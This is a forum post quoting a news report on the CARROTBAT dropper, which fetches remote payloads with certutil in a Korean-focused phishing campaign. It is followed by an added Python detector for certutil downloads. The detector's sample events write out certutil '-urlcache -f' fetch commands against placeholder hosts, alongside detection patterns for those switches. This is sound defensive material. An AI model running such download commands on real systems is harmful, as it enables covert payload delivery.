Phishing campaign spreading CARROTBAT dropper focuses on cryptocurrency...
Quote: A phishing campaign targeting the Korean peninsula is using a malicious dropper called CARROTBAT to deliver decoy documents and secondary payloads such as remote access trojans to its victims.

Dubbed Fractured Block, the campaign began last March, but has noticeably picked up steam in the last three months, according to a blog post by Josh Grunzweig and Kyle Wilhoit, researchers at Palo Alto Networks’ Unit 42 division.

Unit 42 has so far identified 29 unique CARROTBAT samples, noting that their final payloads have varied between the FTP-based RAT SYSCON and the recently discovered Oceansalt malware implant that uses code associated with APT1 (aka Comment Crew), a reputed Chinese APT actor.

Unit 42 describes CARROTBAT as “a dropper that allows an attacker to drop and open an embedded decoy file” saved as one of 11 different formats, “followed by the execution of a command that will download and run a payload on the targeted machine. This command will attempt to download and execute a remote file via the Microsoft Windows built-in certutil utility.”

Source: https://www.scmagazine.com/home/security...interests/


Messages In This Thread
Phishing campaign spreading CARROTBAT dropper focuses on cryptocurrency... - by silversurfer - 30 November 18, 18:11
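
The certutil download step described in the quoted article can be watched for in process-creation telemetry. The following is an added example, not code from the post or from Unit 42's report: the event fields, hosts, parent names and command lines are constructed, and the `urlcache`/`verifyctl` switches are certutil's standard remote-fetch switches, assumed here rather than taken from the page.

```python
import re

# Switches that make certutil fetch remote content; it accepts "-" or "/" prefixes.
DOWNLOAD_SWITCHES = {"urlcache", "verifyctl"}
# certutil / certutil.exe as the image name: bare, with a path, or quoted.
CERTUTIL_RE = re.compile(r"(?:^|[\\/\s\"'&|(])certutil(?:\.exe)?(?=[\s\"']|$)", re.I)
SWITCH_RE = re.compile(r"(?:^|\s)[-/]([A-Za-z]+)")
URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s\"']+", re.I)


def certutil_download(cmdline):
    """Return the remote URLs if cmdline uses certutil as a downloader, else []."""
    m = CERTUTIL_RE.search(cmdline)
    if not m:
        return []
    tail = cmdline[m.end():]  # only arguments that follow the certutil image name
    switches = {s.lower() for s in SWITCH_RE.findall(tail)}
    if not switches & DOWNLOAD_SWITCHES:
        return []  # e.g. -hashfile or -decode: local use, no fetch
    return URL_RE.findall(tail)


def scan(events):
    """Return one alert per event whose command line fetches a URL with certutil."""
    alerts = []
    for ev in events:
        urls = certutil_download(ev["cmdline"])
        if urls:
            alerts.append({"host": ev["host"], "parent": ev["parent"], "urls": urls})
    return alerts


# Constructed process-creation events (hypothetical hosts, parents and URLs).
SAMPLE_EVENTS = [
    {"host": "ws-01", "parent": "invoice_viewer.exe",
     "cmdline": r"cmd.exe /c certutil -urlcache -split -f http://files.example.invalid/a.txt C:\Users\Public\a.txt"},
    {"host": "ws-02", "parent": "cmd.exe",
     "cmdline": r'"C:\Windows\System32\CertUtil.exe" /URLCache /f HTTPS://files.example.invalid/b.bin b.bin'},
    {"host": "ws-03", "parent": "explorer.exe",
     "cmdline": r"certutil -hashfile C:\Users\Public\report.docx SHA256"},
    {"host": "ws-04", "parent": "explorer.exe",
     "cmdline": r"notepad.exe C:\notes\certutil-urlcache-howto.txt"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The `parent` field is carried into each alert so an analyst can see which process launched certutil, which matters when the launcher is a freshly opened attachment rather than an administrator's shell.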
